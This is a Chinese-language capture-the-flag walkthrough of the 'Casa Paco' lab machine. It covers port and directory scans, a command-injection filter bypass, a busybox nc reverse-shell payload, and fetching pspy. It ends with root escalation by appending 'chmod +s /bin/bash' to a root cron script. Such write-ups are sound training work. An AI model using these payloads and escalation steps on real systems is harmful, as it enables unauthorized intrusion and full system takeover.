Casa Paco

image

信息搜集

192.168.43.48

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(root㉿kali)-[~]
└─# rustscan -a 192.168.43.48
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.43.48:22
Open 192.168.43.48:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 04:06 EDT
Initiating ARP Ping Scan at 04:06
Scanning 192.168.43.48 [1 port]
Completed ARP Ping Scan at 04:06, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:06
Completed Parallel DNS resolution of 1 host. at 04:06, 0.16s elapsed
DNS resolution of 1 IPs took 0.16s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 04:06
Scanning 192.168.43.48 [2 ports]
Discovered open port 22/tcp on 192.168.43.48
Discovered open port 80/tcp on 192.168.43.48
Completed SYN Stealth Scan at 04:06, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.43.48
Host is up, received arp-response (0.00055s latency).
Scanned at 2026-04-09 04:06:26 EDT for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:5F:EE:09 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

需要写入域名到本地hosts

image

1
192.168.43.48 casapaco.thl

ipconfig /flushdns

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://casapaco.thl/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,wsp,py,js,phps --exclude-length 277
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://casapaco.thl/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          277
[+] User Agent:              gobuster/3.6
[+] Extensions:              phps,php,html,txt,wsp,py,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 2037]
/static               (Status: 301) [Size: 313] [--> http://casapaco.thl/static/]
/menu.html            (Status: 200) [Size: 1969]
Progress: 1764480 / 1764488 (100.00%)
===============================================================
Finished
===============================================================

打点

image

当在Plato输入ls命令的时候提示no intentes hackearme

大概率rce的注入点就在这里

image

输入id返回了信息,但是ls,cat这些都被禁用了,尝试反弹shell看看

尝试将ls替换成dir

image

可以发现当前目录下还有个llevar1.php,在尝试使用more代替cat读取llevar.php和llevar1.php看看有啥区别

image

image

可以看到llevar1.php没有过滤,那么直接反弹shell

1
dish=busybox nc 192.168.43.49 7777 -e sh&name=1

image

提权

www -> root

在pacogerente用户的家目录下有一个fabada.sh

1
2
3
4
#!/bin/bash

# Generar un log de actividad
echo "Ejecutado por cron el: $(date)" >> /home/pacogerente/log.txt

考虑是不是定时任务

上传pspy64运行分析

1
busybox wget http://192.168.43.37:8080/pspy64

image

可以看到fabada.sh会周期性地以 root 权限运行

可以覆盖掉fabada.sh

1
2
3
4
5
6
7
8
9
10
11
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ echo ""chmod +s /bin/bash >> /home/pacogerente/fabada.sh 
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ /bin/bash -p
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ ls -al /bin/bash
-rwxr-xr-x 1 root root 1265648 Mar 29  2024 /bin/bash
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ /bin/bash -p    
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ /bin/bash -p
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ /bin/bash -p
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ /bin/bash -p
bash-5.2# whoami
root
bash-5.2#